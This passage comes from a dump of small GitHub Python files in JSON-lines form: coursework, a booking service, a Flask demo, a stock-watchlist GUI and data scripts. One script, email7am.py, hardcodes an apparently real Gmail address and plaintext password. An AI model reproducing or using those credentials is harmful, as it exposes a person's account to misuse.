next_node = node.next\n return concatenate(temp_node, substitute_rec(next_node, element, substitute_node)).first\n\n\ndef get_last_element(input_list):\n last_element = get_last_element_rec(input_list.first)\n return last_element\n\n\ndef get_last_element_rec(node):\n if node is None:\n return None\n\n if node.next is None:\n return node.value\n\n return get_last_element_rec(node.next)\n\n\ndef main():\n l1 = create_list_from_list([3, 2, 1, 2])\n l2 = create_list_from_list([9, 9])\n\n # con = concatenate(l1.first, l2.first)\n # print_list(con)\n\n sub = substitute(l1, 2, l2)\n print(\"Substituted list: \")\n print_list(sub)\n\n last_element = get_last_element(l1)\n print(f\"\\nLast element: {last_element}\")\n\n\nmain()\n","repo_name":"caprapaul/assignments","sub_path":"semester_3/pfl/r1/lista.py","file_name":"lista.py","file_ext":"py","file_size_in_byte":2792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"75047595893","text":"senha = 'Blue123'\nleitura = ''\nerros = 0\n\nwhile (leitura != senha):\n leitura = input('Digite a senha: ')\n if leitura == senha:\n print('Acesso liberado')\n else:\n erros += 1\n print('Senha incorreta, digite novamente!')\n\nprint(f'Você errou a senha {erros} vezes!')","repo_name":"danmachinez/Blue_Mod1","sub_path":"Aula04/Leitura de senha.py","file_name":"Leitura de senha.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34664273743","text":"\"\"\"empty message\n\nRevision ID: 6e516be39982\nRevises: 219a462be2e3\nCreate Date: 2021-03-17 15:07:36.548592\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"6e516be39982\"\ndown_revision = \"219a462be2e3\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table(\n \"roles\",\n sa.Column(\"name\", sa.String(length=50), nullable=False),\n sa.PrimaryKeyConstraint(\"name\"),\n )\n op.add_column(\"users\", sa.Column(\"_role\", sa.String(length=50), nullable=True))\n op.create_foreign_key(None, \"users\", \"roles\", [\"_role\"], [\"name\"])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, \"users\", type_=\"foreignkey\")\n op.drop_column(\"users\", \"_role\")\n op.drop_table(\"roles\")\n # ### end Alembic commands ###\n","repo_name":"Diverso-NVR/NVR","sub_path":"backend/migrations/versions/6e516be39982_.py","file_name":"6e516be39982_.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18228443850","text":"from gmail import GMail, Message\nfrom datetime import datetime\nfrom threading import Timer\n\n\nx=datetime.today()\ny=x.replace(day=x.day+7, hour=7, minute=0, second=0, microsecond=0)\ndelta_t=y-x\n\nsecs=delta_t.seconds+1\n\ngmail = GMail('dgtran1995@gmail.com', 'Gagaga1995')\nmsg = Message('Xin nghi om', to=\"dennis_1328@yahoo.com.vn\", text=\"Thich thi nghi thoi\")\n\ngmail.send(msg)\n","repo_name":"Dennisdoug/trandangdung-labs-c4e15","sub_path":"Lab 1/Homework/email7am.py","file_name":"email7am.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38294418061","text":"from datetime import date\n\nfrom sqlalchemy import (\n and_,\n delete,\n func,\n insert,\n or_,\n select,\n)\n\nfrom app.bookings.models import Bookings\nfrom app.database import session_maker\nfrom app.rooms.models import Rooms\nfrom app.service.base import BaseService\n\n\nclass BookingsService(BaseService):\n model = Bookings\n\n @classmethod\n async def add(\n cls, user_id: int, room_id: int, check_in_date: date, check_out_date: date\n ):\n async with session_maker() as session:\n booked_rooms = (\n select(Bookings)\n .where(\n and_(\n Bookings.room_id == room_id,\n or_(\n and_(\n Bookings.check_in_date >= check_out_date,\n Bookings.check_in_date <= check_out_date,\n ),\n and_(\n Bookings.check_in_date <= check_out_date,\n Bookings.check_out_date > check_in_date,\n ),\n ),\n )\n )\n .cte(\"booked_rooms\")\n )\n\n get_rooms_left = (\n select(\n (Rooms.rooms_quantity - func.count(booked_rooms.c.room_id)).label(\n \"rooms_left\"\n )\n )\n .select_from(Rooms)\n .join(booked_rooms, booked_rooms.c.room_id == Rooms.id, isouter=True)\n .where(Rooms.id == 1)\n .group_by(Rooms.rooms_quantity, booked_rooms.c.room_id)\n )\n\n rooms_left = await session.execute(get_rooms_left)\n rooms_left: int = rooms_left.scalar()\n\n if rooms_left > 0:\n get_price = select(Rooms.price).filter_by(id=room_id)\n price = await session.execute(get_price)\n price: int = price.scalar()\n add_booking = (\n insert(Bookings)\n .values(\n room_id=room_id,\n user_id=user_id,\n check_in_date=check_in_date,\n check_out_date=check_out_date,\n price=price,\n )\n .returning(Bookings)\n )\n\n new_booking = await session.execute(add_booking)\n await session.commit()\n return new_booking.scalar()\n else:\n return None\n\n @classmethod\n async def delete(cls, user_id: int, booking_id: int):\n async with session_maker() as session:\n query = delete(Bookings).filter_by(id=booking_id, user_id=user_id)\n await session.execute(query)\n await session.commit()\n","repo_name":"drwalther/booking_app","sub_path":"app/bookings/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38240389413","text":"import asyncio, math\r\nimport sys\r\nfrom datetime import datetime\r\nfrom ib_insync import *\r\nfrom PyQt5.QtCore import QTimer, Qt\r\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QTableWidget, QTableWidgetItem, QVBoxLayout, QWidget, QLineEdit, QPushButton, QMenu, QAction, QComboBox\r\nfrom PyQt5.QtGui import QColor, QBrush\r\nimport qdarktheme\r\nfrom datetime import date\r\nimport finviz\r\nfrom finvizfinance.group.overview import Overview\r\nimport webbrowser\r\nimport concurrent.futures\r\nimport functools\r\nfrom concurrent.futures import ThreadPoolExecutor\r\nimport yfinance as yf\r\nfrom bs4 import BeautifulSoup\r\nimport pytz, requests\r\nfrom fractions import Fraction\r\n\r\n# Conectarse a la API de TWS\r\nib = IB()\r\nib.connect('127.0.0.1', 7497, clientId=1)\r\n\r\n\r\nclass MarketDataWindow(QMainWindow):\r\n def __init__(self):\r\n super().__init__()\r\n self.current_symbols = set() # Símbolos actuales en la tabla\r\n\r\n # Aplicar el estilo QDarkStyle\r\n self.setStyleSheet(qdarktheme.setup_theme())\r\n\r\n # Crear una tabla para mostrar los datos del mercado\r\n self.table = QTableWidget()\r\n self.table.setColumnCount(21)\r\n self.table.setHorizontalHeaderLabels(['Symbol', 'Halted', 'Sector', 'Industry', 'Close', 'Open', 'Gap', 'Last Price', 'Change', 'Float', 'Volumen', 'Vol/Float', 'News', 'Offerings Past', 'Offerings Future', 'Splits Past', 'Splits Future', 'Halteds Past', 'Halteds Future', 'Patrones Past', 'Patrones Future'])\r\n\r\n # Campo de entrada de texto para introducir los símbolos de los contratos\r\n self.symbolInput = QLineEdit()\r\n self.symbolInput.returnPressed.connect(self.add_symbols)\r\n\r\n # Botón para agregar los símbolos introducidos por el usuario\r\n self.addButton = QPushButton(\"Agregar\")\r\n self.addButton.clicked.connect(self.add_symbols)\r\n\r\n # Configurar la tabla y los controles en un widget contenedor\r\n widget = QWidget()\r\n layout = QVBoxLayout(widget)\r\n layout.addWidget(self.symbolInput)\r\n layout.addWidget(self.addButton)\r\n layout.addWidget(self.table)\r\n\r\n # Configurar el widget contenedor como el contenido central de la ventana principal\r\n self.setCentralWidget(widget)\r\n\r\n # Definir un diccionario para almacenar los precios del mercado\r\n self.last_price = {}\r\n self.get_ticker = {}\r\n self.sector_data = {} # Almacenar los datos del sector por símbolo\r\n # Leer los símbolos desde el archivo y agregarlos a la tabla\r\n with open('symbols.txt', 'r') as file:\r\n symbols = [line.strip().split(',')[0] for line in file]\r\n contracts = [Stock(symbol.strip().upper(), 'SMART', 'USD') for symbol in symbols]\r\n for contract in contracts:\r\n asyncio.ensure_future(self.update_market_data(contract))\r\n asyncio.ensure_future(self.get_sectorindustriafloat_finviz_data(contract.symbol)) # Asynchronously get Finviz data\r\n asyncio.ensure_future(self.check_news_updates())# Iniciar la verificación de noticias\r\n\r\n # Ejecutar el bucle de eventos de asyncio mediante QTimer\r\n self.timer = QTimer()\r\n self.timer.timeout.connect(self.update_event_loop)\r\n self.timer.start(0)\r\n\r\n # Asignar el evento de menú contextual a la tabla\r\n self.table.setContextMenuPolicy(3) # 3 corresponde a Qt.CustomContextMenu\r\n self.table.customContextMenuRequested.connect(self.context_menu_event)\r\n\r\n self.update_count = 0\r\n\r\n # Agregar los símbolos introducidos por el usuario como contratos a monitorear\r\n def add_symbols(self):\r\n symbols = self.symbolInput.text().split(',')\r\n contracts = [Stock(symbol.strip().upper(), 'SMART', 'USD') for symbol in symbols]\r\n\r\n unique_contracts = [contract for contract in contracts if contract.symbol not in self.current_symbols]\r\n\r\n if not unique_contracts:\r\n self.symbolInput.clear()\r\n return\r\n\r\n with open('symbols.txt', 'a') as file:\r\n for contract in unique_contracts:\r\n symbol = contract.symbol\r\n current_date = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\r\n file.write(f\"{symbol},{current_date}\\n\")\r\n self.current_symbols.add(symbol) # Agregar el símbolo a los símbolos actuales\r\n\r\n with open('symbols_history.txt', 'a') as file:\r\n for contract in unique_contracts:\r\n symbol = contract.symbol\r\n current_date = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\r\n file.write(f\"{symbol},{current_date}, agregado\\n\")\r\n self.current_symbols.add(symbol) # Agregar el símbolo a los símbolos actuales\r\n\r\n for contract in unique_contracts:\r\n print(\"probando\")\r\n asyncio.ensure_future(self.update_market_data(contract))\r\n asyncio.ensure_future(self.get_sectorindustriafloat_finviz_data(contract.symbol))\r\n asyncio.ensure_future(self.check_news_updates())# Iniciar la verificación de noticias\r\n\r\n self.symbolInput.clear()\r\n\r\n def find_row_by_symbol(self, symbol):\r\n for row in range(self.table.rowCount()):\r\n item = self.table.item(row, 0) # Assuming symbol is in the first column\r\n if item and item.text() == symbol:\r\n return row\r\n return -1 # Symbol not found\r\n\r\n async def check_news_updates(self):\r\n while True:\r\n current_time = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\r\n \r\n for symbol in self.current_symbols:\r\n print(\"check_news_updates\")\r\n dropdown = self.get_news(symbol)\r\n row = self.find_row_by_symbol(symbol)\r\n current_news = self.table.cellWidget(row, 12)\r\n if dropdown.currentText() != current_news.currentText():\r\n self.table.setCellWidget(row, 12, dropdown)\r\n dropdown.setStyleSheet(\"background-color: darkYellow\")\r\n await asyncio.sleep(10) # Verificar las noticias cada 60 segundos\r\n\r\n\r\n\r\n\r\n async def get_sectorindustriafloat_finviz_data(self, symbol):\r\n overview = Overview()\r\n ### HOT SECTORS AND INDUSTRIES\r\n def fetch_hot_sectors():\r\n hot_sectors = overview.screener_view(group='Sector', order='Change')\r\n return hot_sectors\r\n def fetch_hot_industries():\r\n hot_industries = overview.screener_view(group='Industry', order='Change')\r\n return hot_industries\r\n # Utiliza asyncio.gather para ejecutar las llamadas en paralelo\r\n screener_table_sectors, screener_table_industries, infofinviz = await asyncio.gather(\r\n asyncio.get_event_loop().run_in_executor(None, fetch_hot_sectors),\r\n asyncio.get_event_loop().run_in_executor(None, fetch_hot_industries),\r\n asyncio.get_event_loop().run_in_executor(None, finviz.get_stock, symbol)\r\n )\r\n screener_table_sorted_sectors = screener_table_sectors.sort_values(by='\\n\\nChange', ascending=False)\r\n name_change_df_sectors = screener_table_sorted_sectors[[\"Name\", \"\\n\\nChange\"]]\r\n\r\n\r\n # Obtener los valores de los índices en variables\r\n sectornames = name_change_df_sectors[\"Name\"].values\r\n changes = name_change_df_sectors[\"\\n\\nChange\"].values\r\n name_change_dict_sector = {}\r\n for n, (name, change) in enumerate(zip(sectornames, changes), start=1):\r\n name_change_dict_sector[name] = {'id': n, 'change': change}\r\n\r\n screener_table_sorted_industries = screener_table_industries.sort_values(by='\\n\\nChange', ascending=False)\r\n name_change_df_industries = screener_table_sorted_industries[[\"Name\", \"\\n\\nChange\"]]\r\n\r\n # Obtener los valores de los índices en variables\r\n industriesnames = name_change_df_industries[\"Name\"].values\r\n changes = name_change_df_industries[\"\\n\\nChange\"].values\r\n name_change_dict_industry = {}\r\n for n, (name, change) in enumerate(zip(industriesnames, changes), start=1):\r\n name_change_dict_industry[name] = {'id': n, 'change': change}\r\n\r\n ### SECTORS AND INDUSTRIES DE CADA COMPAÑIA\r\n if infofinviz['Sector'] not in ['Communication Services', 'Technology', 'Consumer Cyclical', 'Financial',\r\n 'Basic Materials', 'Energy', 'Industrials', 'Healthcare',\r\n 'Consumer Defensive', 'Real Estate', 'Utilities']:\r\n symbol = infofinviz['Company']\r\n sector = infofinviz['Industry']\r\n industry = infofinviz['Country']\r\n shares_float = infofinviz['Shs Float']\r\n else:\r\n symbol = infofinviz['Company']\r\n sector = infofinviz['Sector']\r\n industry = infofinviz['Industry']\r\n shares_float = infofinviz['Shs Float']\r\n\r\n self.sector_data[symbol] = (sector, industry, shares_float, name_change_dict_sector, name_change_dict_industry)\r\n\r\n\r\n\r\n\r\n\r\n # Definir una función asincrónica para solicitar los datos del mercado y actualizar la tabla\r\n async def update_market_data(self, contract):\r\n # Solicitar los datos del mercado\r\n ticker = ib.reqMktData(contract)\r\n # Guarda toda la info en esta lista aquí porque si se hace en el bucle la ventana va mal\r\n self.get_ticker[contract.symbol] = ticker\r\n \r\n while True:\r\n if ticker.last != self.last_price.get(contract.symbol):\r\n self.last_price[contract.symbol] = ticker.last\r\n self.update_table()\r\n\r\n # Verificar si el símbolo aún está presente en el archivo \"symbols.txt\"\r\n with open('symbols.txt', 'r') as file:\r\n symbols = [line.strip().split(',')[0] for line in file]\r\n\r\n if contract.symbol not in symbols:\r\n self.remove_symbol_from_table(contract.symbol) # Eliminar el símbolo de la tabla\r\n del self.last_price[contract.symbol] # Eliminar el símbolo del diccionario last_price\r\n break # Salir del bucle while\r\n\r\n await asyncio.sleep(0.01)\r\n\r\n\r\n def context_menu_event(self, pos):\r\n context_menu = QMenu(self)\r\n\r\n remove_action = QAction(\"Eliminar\", self)\r\n remove_action.triggered.connect(self.remove_symbol)\r\n context_menu.addAction(remove_action)\r\n\r\n # Obtener la posición del ítem seleccionado\r\n selected_indexes = self.table.selectedIndexes()\r\n if selected_indexes:\r\n symbol_item = self.table.item(selected_indexes[0].row(), 0)\r\n symbol = symbol_item.text()\r\n\r\n # Puedes agregar más acciones al menú contextual aquí\r\n\r\n # Ejecutar el menú contextual en la posición especificada\r\n context_menu.exec_(self.table.viewport().mapToGlobal(pos))\r\n\r\n def remove_symbol_from_table(self, symbol):\r\n rows = self.table.rowCount()\r\n for row in range(rows):\r\n symbol_item = self.table.item(row, 0)\r\n if symbol_item and symbol_item.text() == symbol:\r\n self.table.removeRow(row)\r\n break\r\n\r\n def remove_symbol(self):\r\n selected_indexes = self.table.selectedIndexes()\r\n if selected_indexes:\r\n symbol_item = self.table.item(selected_indexes[0].row(), 0)\r\n symbol = symbol_item.text()\r\n\r\n with open('symbols.txt', 'r') as file:\r\n lines = file.readlines()\r\n\r\n updated_lines = []\r\n for line in lines:\r\n stored_symbol = line.strip().split(',')[0]\r\n if stored_symbol != symbol:\r\n updated_lines.append(line)\r\n\r\n with open('symbols.txt', 'w') as file:\r\n file.writelines(updated_lines)\r\n\r\n if symbol in self.current_symbols: # Verificar si el símbolo existe en el conjunto\r\n self.table.removeRow(selected_indexes[0].row())\r\n self.current_symbols.remove(symbol) # Eliminar el símbolo de los símbolos actuales\r\n del self.last_price[symbol] # Eliminar el símbolo del diccionario last_price\r\n self.update_table() # Actualizar la tabla con los datos modificados\r\n self.remove_symbol_from_table(symbol) # Eliminar el símbolo de la tabla\r\n\r\n current_date = datetime.now().strftime(\"%d/%m/%Y %H:%M:%S\")\r\n with open('symbols_history.txt', 'a') as file:\r\n file.write(f\"{symbol},{current_date}, eliminado\\n\")\r\n\r\n def get_news(self, symbol):\r\n dropdown = QComboBox()\r\n results = []\r\n print(\"Checkeando noticias\")\r\n def process_yahoo_news():\r\n try:\r\n # Obtain news with yfinance\r\n ticker = yf.Ticker(symbol)\r\n news = ticker.news\r\n for n in news:\r\n titulo = n['title']\r\n hora = n['providerPublishTime']\r\n link = n['link']\r\n dt = datetime.fromtimestamp(hora)\r\n ny_timezone = pytz.timezone('America/New_York')\r\n ny_dt = dt.astimezone(ny_timezone)\r\n ny_time_str = ny_dt.strftime('%d-%m-%Y %H:%M:%S')\r\n\r\n results.append((ny_time_str, f\"YH = {symbol} | {ny_time_str} de NY | {titulo}\", link))\r\n\r\n except Exception as e:\r\n print(f\"Error al obtener noticias de Yahoo Finance para {symbol}: {e}\")\r\n\r\n def process_stock_titan_news():\r\n try:\r\n # Obtain news from stock_titan\r\n url = 'https://www.stocktitan.net/news/' + symbol + '/'\r\n response = requests.get(url)\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n articles = soup.find_all('article')\r\n for article in articles:\r\n hora = article.find('div', class_='date').text\r\n hora = datetime.strptime(hora, \"%m/%d/%y %I:%M %p\")\r\n hora = hora.strftime(\"%d-%m-%Y %H:%M:%S\")\r\n titulo = article.find('div', {'class': 'title'}).text\r\n enlace = article.find('div', {'class': 'title'}).find('a')['href']\r\n\r\n results.append((hora, f\"ST = {symbol} | {hora} de NY | {titulo}\", enlace))\r\n\r\n except Exception as e:\r\n print(f\"Error al obtener noticias de Stock Titan para {symbol}: {e}\")\r\n\r\n with concurrent.futures.ThreadPoolExecutor() as executor:\r\n future_yahoo = executor.submit(process_yahoo_news)\r\n future_stock_titan = executor.submit(process_stock_titan_news)\r\n\r\n # Esperar a que se completen las tareas en paralelo\r\n concurrent.futures.wait([future_yahoo, future_stock_titan])\r\n\r\n # Sort the results by time\r\n results = sorted(results, key=lambda x: datetime.strptime(x[0], '%d-%m-%Y %H:%M:%S'), reverse=True)\r\n\r\n # Show the results in the dropdown menu\r\n for index, result in enumerate(results): # Added index variable here\r\n dropdown.addItem(result[1])\r\n dropdown.setItemData(index, result[2], Qt.UserRole) # Added index variable here\r\n\r\n # Set colors if it has YH or ST\r\n for index, result in enumerate(results):\r\n news_date = datetime.strptime(result[0], '%d-%m-%Y %H:%M:%S').date()\r\n \r\n if news_date == date.today():\r\n # Aplicar estilo si la fecha es hoy\r\n dropdown.setStyleSheet(\"background-color: darkBlue\")\r\n if 'YH' in result[1]:\r\n dropdown.setItemData(index, QBrush(QColor('#470463')), Qt.BackgroundRole)\r\n dropdown.setItemData(index, QBrush(QColor('white')), Qt.ForegroundRole)\r\n elif 'ST' in result[1]:\r\n dropdown.setItemData(index, QBrush(QColor('#020a40')), Qt.BackgroundRole)\r\n dropdown.setItemData(index, QBrush(QColor('white')), Qt.ForegroundRole)\r\n\r\n dropdown.activated.connect(self.open_news_link)\r\n\r\n return dropdown\r\n\r\n def get_splits(self, symbol):\r\n print('HACIENDO SPLITS')\r\n dropdown_splits = QComboBox()\r\n results_splits = []\r\n\r\n def process_splits():\r\n try:\r\n ticker = yf.Ticker(symbol)\r\n splits = ticker.splits\r\n\r\n for split_date, split_ratio in splits.items():\r\n split_date_str = split_date.strftime(\"%d-%m-%Y\")\r\n\r\n if split_ratio > 1:\r\n split_type = \"Split\"\r\n precio_anterior = 5\r\n new_price = precio_anterior / split_ratio\r\n split_info = f\"{symbol} - {split_date_str} - SPLIT (más acciones, menor precio) de {split_ratio} a 1. Si el precio anterior era de {precio_anterior}, ahora será de {new_price}. Dividir precio entre {split_ratio}\"\r\n #print(symbol, split_date_str, split_info)\r\n else:\r\n split_type = \"Reverse split\"\r\n split_ratio = Fraction(1 / split_ratio).limit_denominator(1000)\r\n precio_anterior = 5\r\n new_price = precio_anterior * split_ratio\r\n split_info = f\"{symbol} - {split_date_str} - REVERSE SPLIT (menos acciones, mayor precio) de 1 a {split_ratio}. Si el precio anterior era de {precio_anterior}, ahora será de {new_price}. Multiplicar precio por {split_ratio}\"\r\n #print(symbol, split_date_str, split_info)\r\n results_splits.append((symbol, \"-\", split_date_str, \"-\", split_type, split_info))\r\n\r\n except Exception as e:\r\n print(f\"Error al obtener splits de Yahoo Finance para {symbol}: {e}\")\r\n\r\n with concurrent.futures.ThreadPoolExecutor() as executor:\r\n future_splits = executor.submit(process_splits)\r\n # Esperar a que se completen las tareas en paralelo\r\n concurrent.futures.wait([future_splits])\r\n # Sort the results by time\r\n results_splits = sorted(results_splits, key=lambda x: datetime.strptime(x[2], '%d-%m-%Y'), reverse=True)\r\n # Show the results in the splits dropdown menu\r\n for index, result in enumerate(results_splits):\r\n dropdown_splits.addItem(result[5]) # Agregar result[5] en lugar de result[1]\r\n dropdown_splits.setItemData(index, result[5], Qt.UserRole) # Usar result[5] en lugar de result[2]\r\n\r\n return dropdown_splits\r\n\r\n # Actualizar la tabla con los datos del mercado\r\n def update_table(self):\r\n self.table.setRowCount(len(self.last_price))\r\n row = 0\r\n for symbol, ticker in self.last_price.items():\r\n ticker = self.get_ticker.get(symbol)\r\n item_symbol = QTableWidgetItem(symbol)\r\n item_symbol.setTextAlignment(0x0084) # Alinear el texto en mayúsculas\r\n item_halted = QTableWidgetItem(str(ticker.halted))\r\n if ticker.halted == 2.0 or ticker.halted == 1.0:\r\n item_halted.setBackground(Qt.darkRed)\r\n\r\n sector, industry, shares_float, name_change_dict_sector, name_change_dict_industry = self.sector_data.get(symbol, (\"\", \"\", \"\", {}, {}))\r\n changes_sectors = name_change_dict_sector.get(sector, {}).get('change', \"\")\r\n changes_industries = name_change_dict_industry.get(industry, {}).get('change', \"\")\r\n\r\n if changes_sectors:\r\n changes_sectors = f\"{float(changes_sectors) * 100:.2f}%\"\r\n item_sector = QTableWidgetItem(f\"{name_change_dict_sector.get(sector, {}).get('id', '')} - {sector} ({changes_sectors})\")\r\n if changes_sectors:\r\n changes_sectors = float(changes_sectors.strip(\"%\"))\r\n if changes_sectors > 0:\r\n item_sector.setBackground(Qt.darkYellow) # Dark green\r\n\r\n\r\n \r\n if changes_industries:\r\n changes_industries = f\"{float(changes_industries) * 100:.2f}%\"\r\n item_industry = QTableWidgetItem(f\"{name_change_dict_industry.get(industry, {}).get('id', '')} - {industry} ({changes_industries})\")\r\n if changes_industries:\r\n changes_industries = float(changes_industries.strip(\"%\"))\r\n if changes_industries > 0:\r\n item_industry.setBackground(Qt.darkYellow) # Dark green\r\n\r\n\r\n\r\n\r\n item_last_price = QTableWidgetItem(str(ticker.last))\r\n item_close = QTableWidgetItem(str(ticker.close))\r\n item_open = QTableWidgetItem(str(ticker.open))\r\n gap = (ticker.open - ticker.close) / ticker.close * 100\r\n item_gap = QTableWidgetItem(f\"{gap:.2f}%\")\r\n change = (ticker.last - ticker.close) / ticker.close * 100\r\n item_change = QTableWidgetItem(f\"{change:.2f}%\")\r\n\r\n item_float = QTableWidgetItem(str(shares_float))\r\n\r\n ## VOLUMEN\r\n # Convertir el volumen del día a una cadena formateada\r\n volume = ticker.volume * 100\r\n if volume >= 1_000_000:\r\n volume_str = f\"{volume / 1_000_000:.2f}M\"\r\n elif volume >= 1_000:\r\n volume_str = f\"{volume / 1_000:.2f}k\"\r\n else:\r\n volume_str = str(volume)\r\n\r\n item_volumenDelDia = QTableWidgetItem(volume_str)\r\n\r\n float_value = None # Inicializar float_value\r\n if shares_float != '':\r\n value = float(shares_float[:-1])\r\n\r\n # Determinar el factor de conversión\r\n suffix = shares_float[-1]\r\n if suffix == 'M':\r\n conversion_factor = 1000000 # Multiplicar por 1,000,000 para convertir de \"M\" a millones completos\r\n elif suffix == 'B':\r\n conversion_factor = 1000000000 # Multiplicar por 1,000,000,000 para convertir de \"B\" a billones completos\r\n\r\n # Realizar la conversión\r\n float_value = value * conversion_factor\r\n\r\n # Obtener el volumen/float (%) y establecerlo en la columna 10\r\n item_volumenSobreFloat = QTableWidgetItem(\"\")\r\n if float_value is not None and not math.isnan(float_value):\r\n item_volumenSobreFloat = QTableWidgetItem(f\"{volume/float_value*100:.2f}%\")\r\n\r\n\r\n\r\n \r\n self.table.setItem(row, 0, item_symbol)\r\n self.table.setItem(row, 1, item_halted)\r\n self.table.setItem(row, 2, item_sector)\r\n self.table.setItem(row, 3, item_industry)\r\n self.table.setItem(row, 4, item_close)\r\n self.table.setItem(row, 5, item_open)\r\n self.table.setItem(row, 6, item_gap)\r\n self.table.setItem(row, 7, item_last_price)\r\n self.table.setItem(row, 8, item_change)\r\n self.table.setItem(row, 9, item_float)\r\n self.table.setItem(row, 10, item_volumenDelDia)\r\n self.table.setItem(row, 11, item_volumenSobreFloat)\r\n\r\n # Verificar si ya se ha creado el widget de noticias para la fila actual\r\n if self.table.cellWidget(row, 12) is None:\r\n # Si el widget de noticias no existe, crearlo y establecerlo en la celda\r\n news_dropdown = self.get_news(symbol)\r\n self.table.setCellWidget(row, 12, news_dropdown)\r\n # Verificar si ya se ha creado el widget de noticias para la fila actual\r\n if self.table.cellWidget(row, 15) is None:\r\n # Si el widget de noticias no existe, crearlo y establecerlo en la celda\r\n splits_dropdown = self.get_splits(symbol)\r\n self.table.setCellWidget(row, 15, splits_dropdown)\r\n\r\n row += 1\r\n # Incrementar el contador en cada llamada a la función\r\n self.update_count += 1\r\n # Establecer el tamaño de las columnas para que se expandan\r\n if self.update_count == 100:\r\n print(\"\\nAjustando columnas a texto\")\r\n self.table.resizeColumnsToContents()\r\n\r\n def open_news_link(self, index):\r\n selected_item = self.sender()\r\n link = selected_item.itemData(index, Qt.UserRole)\r\n webbrowser.open(link)\r\n # Función para actualizar el bucle de eventos de asyncio\r\n def update_event_loop(self):\r\n asyncio.get_event_loop().stop()\r\n asyncio.get_event_loop().run_forever()\r\n\r\n def closeEvent(self, event):\r\n # Obtener las solicitudes de reqMktData pendientes\r\n pending_requests = ib.pendingTickers()\r\n\r\n # Mostrar las solicitudes pendientes\r\n for ticker in pending_requests:\r\n print(\"Símbolo:\", ticker.contract.symbol)\r\n\r\n\r\n # Cancelar las solicitudes de reqMktData pendientes\r\n for ticker in pending_requests:\r\n ib.cancelMktData(ticker.contract)\r\n\r\n # Verificar que todas las solicitudes se hayan cancelado\r\n canceled_requests = ib.pendingTickers()\r\n if not canceled_requests:\r\n print(\"Todas las solicitudes de reqMktData se han cancelado correctamente\")\r\n else:\r\n print(\"\\n\", canceled_requests)\r\n print(\"\\nNo se pudieron cancelar todas las solicitudes de reqMktData\")\r\n\r\n # Desconectar de Interactive Brokers\r\n ib.disconnect()\r\n # Llamar al método closeEvent de la clase base para realizar el cierre de la ventana\r\n super().closeEvent(event)\r\n\r\n print(\"Desconectado de IBKR\")\r\n\r\nif __name__ == '__main__':\r\n app = QApplication(sys.argv)\r\n mainWindow = MarketDataWindow()\r\n mainWindow.resize(800, 800)\r\n mainWindow.show()\r\n sys.exit(app.exec_())","repo_name":"regholl/Stocks-Watchlist","sub_path":"splits.py","file_name":"splits.py","file_ext":"py","file_size_in_byte":25879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"33717369618","text":"# 模板 jinja2\n\nfrom flask import Flask,render_template\n\napp = Flask(__name__)\n\n\n@app.route('/index')\ndef index():\n data = {\n 'name': '张三',\n 'age': 18,\n 'mylist': [1, 2, 3, 4, 5, 6]\n }\n return render_template('index2.html', data=data)\n\n\ndef list_step(li):\n \"\"\"自定义过滤器\"\"\"\n return li[::2]\n\n\n# 注册过滤器 1.自定义函数的名字 2.前端用到时的名字\napp.add_template_filter(list_step, 'li2')\n\n# li = [1, 2, 3, 4, 5]\n\n# print(list_step(li))\n\nif __name__ == '__main__':\n app.run()\n","repo_name":"jjc09uiom/flaskStudy","sub_path":"test/模板.py","file_name":"模板.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37219644791","text":"class Solution:\n def maxSubsequence(self, nums: 'List[int]', k: int) -> 'List[int]':\n hmp = {}\n for i, n in enumerate(nums):\n if n not in hmp:\n hmp[n] = []\n hmp[n].append(i)\n \n locs = []\n for n in sorted(nums)[-k:]: #find the location of each number\n locs.append(hmp[n].pop(0))\n \n locs.sort() #sort the location to make it a subsequence of the original array\n output = []\n for loc in locs:\n output.append(nums[loc]) \n return output\n\n \n \n","repo_name":"renjieliu/leetcode","sub_path":"2000_2499/2099.py","file_name":"2099.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"35176990426","text":"age=int(input(\"Enter your age:\"))\nn=age\nfact=1\n\nwhile (age>1):\n\tfact*=age\n\tage-=1\nelse:\n\tprint(\"Python while loops have redundant else\")\nprint(\"Factorial of your age is\",fact)\n","repo_name":"Hemvati/Python","sub_path":"while.py","file_name":"while.py","file_ext":"py","file_size_in_byte":176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11679364473","text":"import numpy as np\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pickle\nfrom matplotlib.colors import Normalize\nfrom matplotlib import rc\nfrom matplotlib.colors import LogNorm\nimport glob\nimport ipdb\nfrom matplotlib.colors import LogNorm\nimport h5py as h5\n\nmethod = \"etks_hybrid\"\nstat = 'fore'\ntanl = 0.10\nmda = 'false'\n\nf = h5.File('./processed_all_smoother_state_diffusion_0.00_tanl_' + str(tanl).ljust(4,\"0\") + '_nanl_20000_burn_05000_mda_' + mda + '.h5', 'r')\n\n\ndef find_optimal_values(method, 